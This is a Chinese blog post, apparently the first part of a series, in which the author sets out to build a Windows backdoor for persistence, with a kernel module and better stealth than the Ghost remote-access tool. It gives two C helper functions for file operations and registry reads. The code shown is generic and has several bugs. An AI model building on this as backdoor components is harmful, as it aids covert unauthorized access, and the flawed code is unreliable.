本来是想寒假时写的,结果一直懒得动手。
虽然手上有ghost源码,但是感觉功能不是我想要的,比如把精力费在学MFC写界面上不如改进下隐藏性。
基本的计划就是做一个后门程序,目的是用来进行权限维持的。目前来看是基于控制台的,而且要带有内核模块,应用层的主要问题就是没写过太大体量的程序导致搞起来很蛋疼,内核方面就是通用性坑爹,
蓝屏起来也要费时间。
第一部分就是封装的两个函数,文件操作和注册表管理。ghost是把这两个功能封装成两个类,我这里就直接用函数来实现了。
VS2015编译通过
1 //文件操作类函数 2 #include "windows.h" 3 4 //Mode操作模式 5 //0.新建文件 1.删除文件 2.写文件 3.读文件 4.移动文件 5.获取文件信息 6 #define CREATE_FILE 0 7 #define DELETE_FILE 1 8 #define WRITE_FILE 2 9 #define READ_FILE 3 10 #define MOVE_FILE 4 11 #define QUERY_FILE 5 12 13 #define FILE_SUCCESS 1 14 #define FILE_ERROR 0 15 16 //定义一个文件信息的结构,用于QUERY_FILE返回 17 typedef struct _FileInfo{ 18 DWORD FileAttributes; 19 char *FileName; 20 char *TypeName; 21 22 } FILE_INFO,*PFILE_INFO; 23 24 DWORD FileControl(IN DWORD Mode,IN LPWSTR FilePath, IN OUT PVOID Buffer,IN __int64 FilePointer,IN OUT DWORD *Size) 25 { 26 HANDLE FileHandle = 0; 27 DWORD Return = 0; 28 SHFILEINFO MyFileInfo = { 0 }; 29 PFILE_INFO FileInfo = 0; 30 __int64 TempPointer = FilePointer; 31 TempPointer = TempPointer & 0XFFFFFFFF; 32 __int64 *pTempPointer = &TempPointer; 33 switch (Mode) 34 { 35 case WRITE_FILE: 36 case READ_FILE: 37 case QUERY_FILE: 38 FileHandle=CreateFile(FilePath, 39 GENERIC_READ | GENERIC_WRITE | GENERIC_ALL, 40 FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE, 41 NULL, 42 OPEN_EXISTING, 43 FILE_ATTRIBUTE_NORMAL, 44 NULL 45 ); 46 if (FileHandle== INVALID_HANDLE_VALUE) 47 { 48 Return = GetLastError(); 49 return Return; 50 } 51 break; 52 case CREATE_FILE: 53 FileHandle = CreateFile(FilePath, 54 GENERIC_READ | GENERIC_WRITE | GENERIC_ALL, 55 FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE, 56 NULL, 57 CREATE_NEW, 58 FILE_ATTRIBUTE_NORMAL, 59 NULL 60 ); 61 if (FileHandle == INVALID_HANDLE_VALUE) 62 { 63 Return = GetLastError(); 64 return Return; 65 } 66 break; 67 default: 68 break; 69 } 70 switch (Mode) 71 { 72 case CREATE_FILE: 73 CloseHandle(FileHandle); 74 break; 75 case DELETE_FILE: 76 if (!DeleteFile(FilePath)) 77 { 78 Return = GetLastError(); 79 return Return; 80 } 81 break; 82 case MOVE_FILE: 83 if (!MoveFile(FilePath,(LPCWSTR)Buffer)) 84 { 85 return FILE_ERROR; 86 } 87 break; 88 case QUERY_FILE: 89 SHGetFileInfo(FilePath, 90 NULL, 91 &MyFileInfo, 92 sizeof(MyFileInfo), 93 SHGFI_TYPENAME | SHGFI_DISPLAYNAME | SHGFI_ATTRIBUTES); 94 /////////////////////////////////////////////////// 95 /* 96 typedef struct _SHFILEINFO 97 98 { 99 100 HICON hIcon;//文件的图标句柄 101 102 int iIcon;//图标的系统索引号 103 104 DWORD dwAttributes;//文件的属性值 105 106 char szDisplayName[MAX_PATH];//文件的显示名 107 108 char szTypeName[80];//文件的类型名 109 110 } SHFILEINFO; 111 */ 112 ///////////////////////////////////////////// 113 FileInfo=(PFILE_INFO)HeapAlloc(GetProcessHeap(), 114 HEAP_ZERO_MEMORY, 115 sizeof(FILE_INFO)); 116 if (!FileInfo) 117 { 118 return FILE_ERROR; 119 } 120 memset(FileInfo, 0, sizeof(FILE_INFO)); 121 FileInfo->FileAttributes = MyFileInfo.dwAttributes; 122 FileInfo->FileName = (char *)HeapAlloc(GetProcessHeap(), 123 HEAP_ZERO_MEMORY, 124 sizeof(MyFileInfo.szDisplayName)); 125 memcpy(FileInfo->FileName, 126 MyFileInfo.szDisplayName, 127 sizeof(MyFileInfo.szDisplayName)); 128 FileInfo->TypeName = (char *)HeapAlloc(GetProcessHeap(), 129 HEAP_ZERO_MEMORY, 130 sizeof(MyFileInfo.szTypeName)); 131 memcpy(FileInfo->TypeName, 132 MyFileInfo.szTypeName, 133 sizeof(MyFileInfo.szTypeName)); 134 ((DWORD *)Buffer)[0] = (DWORD)FileInfo; 135 CloseHandle(FileHandle); 136 break; 137 case READ_FILE: 138 if ((!FilePointer)||(!Size)) 139 { 140 return FILE_ERROR; 141 } 142 if (SetFilePointer(FileHandle, 143 (LONG)(FilePointer >> 32), 144 (LONG *)pTempPointer, 145 FILE_BEGIN 146 ) == HFILE_ERROR) 147 { 148 return GetLastError(); 149 } 150 memset(Buffer, 151 0, 152 *Size); 153 if (!ReadFile(FileHandle, 154 (LPVOID)Buffer, 155 *Size, 156 Size, 157 NULL)) 158 { 159 return GetLastError(); 160 } 161 CloseHandle(FileHandle); 162 break; 163 case WRITE_FILE: 164 if ((!FilePointer) || (!Size)) 165 { 166 return FILE_ERROR; 167 } 168 if (SetFilePointer(FileHandle, 169 (LONG)(FilePointer >> 32), 170 (LONG *)pTempPointer, 171 FILE_BEGIN 172 ) == HFILE_ERROR) 173 { 174 return GetLastError(); 175 } 176 if (!WriteFile(FileHandle, 177 (LPCVOID)Buffer, 178 *Size, 179 Size, 180 NULL)) 181 { 182 return GetLastError(); 183 } 184 default: 185 return FILE_ERROR; 186 } 187 return FILE_SUCCESS; 188 } 189 DWORD IfFile(DWORD Return) 190 { 191 switch (Return) 192 { 193 case FILE_SUCCESS: 194 return 1; 195 case FILE_ERROR: 196 return 0; 197 default: 198 return -1; 199 } 200 }
1 //注册表操作的封装函数 2 #include "windows.h" 3 4 #define DUQV 0 5 #define MEIJVZIJIAN 1 6 #define MEIJVJIANXIANG 2 7 #define PANDUANCUNZAI 3 8 //读取注册表的指定键的数据(Mode:0-读键值数据 1-牧举子键 2-牧举指定键项 3-判断该键是否存在) 9 int ReadReg(HKEY MainKey, LPCTSTR SubKey, LPCTSTR Vname, DWORD Type, char *szData, LPBYTE szBytes, DWORD lbSize, int Mode) 10 { 11 HKEY hKey; 12 int iResult = 0; 13 char KeyName[32], ValueSz[MAX_PATH], ValueTemp[MAX_PATH]; 14 DWORD szSize, KnSize, dwIndex = 0; 15 memset(KeyName, 0, sizeof(KeyName)); 16 memset(ValueSz, 0, sizeof(ValueSz)); 17 memset(ValueTemp, 0, sizeof(ValueTemp)); 18 if (RegOpenKeyEx(MainKey,SubKey,0,KEY_READ,&hKey)!=ERROR_SUCCESS) 19 { 20 return -1; 21 } 22 switch (Mode) 23 { 24 case DUQV: 25 switch (Type) 26 { 27 case REG_SZ: 28 case REG_EXPAND_SZ: 29 szSize = sizeof(ValueSz); 30 if (RegQueryValueEx(hKey,Vname,NULL,&Type,(LPBYTE)ValueSz,&szSize)==ERROR_SUCCESS) 31 { 32 return -1; 33 } 34 break; 35 case REG_MULTI_SZ: 36 szSize = sizeof(ValueSz); 37 if (RegQueryValueEx(hKey,Vname,NULL,&Type,(LPBYTE)ValueSz,&szSize)==ERROR_SUCCESS) 38 { 39 return -1; 40 } 41 break; 42 case REG_BINARY: 43 szSize = lbSize; 44 if (RegQueryValueEx(hKey,Vname,NULL,&Type,szBytes,&szSize)==ERROR_SUCCESS) 45 { 46 return -1; 47 } 48 break; 49 } 50 break; 51 case MEIJVZIJIAN: 52 while (1) 53 { 54 memset(ValueSz, 0, sizeof(ValueSz)); 55 szSize = sizeof(ValueSz); 56 if (RegEnumKeyExA(hKey,dwIndex++,ValueSz,&szSize,NULL,NULL,NULL,NULL)!=ERROR_SUCCESS) 57 { 58 break; 59 } 60 wsprintf((LPWSTR)ValueTemp, L"[%s] ", ValueSz); 61 strcat(szData, ValueTemp); 62 iResult = -1; 63 } 64 break; 65 case MEIJVJIANXIANG: 66 while (1) 67 { 68 memset(KeyName, 0, sizeof(KeyName)); 69 memset(ValueSz, 0, sizeof(ValueSz)); 70 memset(ValueTemp, 0, sizeof(ValueTemp)); 71 KnSize = sizeof(KeyName); 72 szSize = sizeof(ValueSz); 73 if (RegEnumValue(hKey,dwIndex++,(LPWSTR)KeyName,&KnSize,NULL,&Type,(LPBYTE)ValueSz,&szSize)!=ERROR_SUCCESS) 74 { 75 break; 76 } 77 switch (Type) 78 { 79 case REG_SZ: 80 wsprintf((LPWSTR)ValueTemp, L"%-24s %-15s %s ", KeyName, "REG_SZ", ValueSz); 81 break; 82 case REG_EXPAND_SZ: 83 wsprintf((LPWSTR)ValueTemp, L"%-24s %-15s %s ", KeyName, "REG_EXPAND_SZ", ValueSz); 84 break; 85 case REG_DWORD: 86 wsprintf((LPWSTR)ValueTemp, L"%-24s %-15s 0x%x(%d) ", KeyName, "REG_DWORD", ValueSz, int(ValueSz)); 87 break; 88 case REG_MULTI_SZ: 89 wsprintf((LPWSTR)ValueTemp, L"%-24s %-15s ", KeyName, "REG_MULTI_SZ"); 90 break; 91 case REG_BINARY: 92 wsprintf((LPWSTR)ValueTemp, L"%-24s %-15s ", KeyName, "REG_BINARY"); 93 break; 94 default: 95 break; 96 } 97 lstrcat((LPWSTR)szData, (LPWSTR)ValueTemp); 98 iResult = 1; 99 } 100 break; 101 case PANDUANCUNZAI: 102 iResult = 1; 103 break; 104 default: 105 break; 106 } 107 RegCloseKey(MainKey); 108 RegCloseKey(hKey); 109 return iResult; 110 }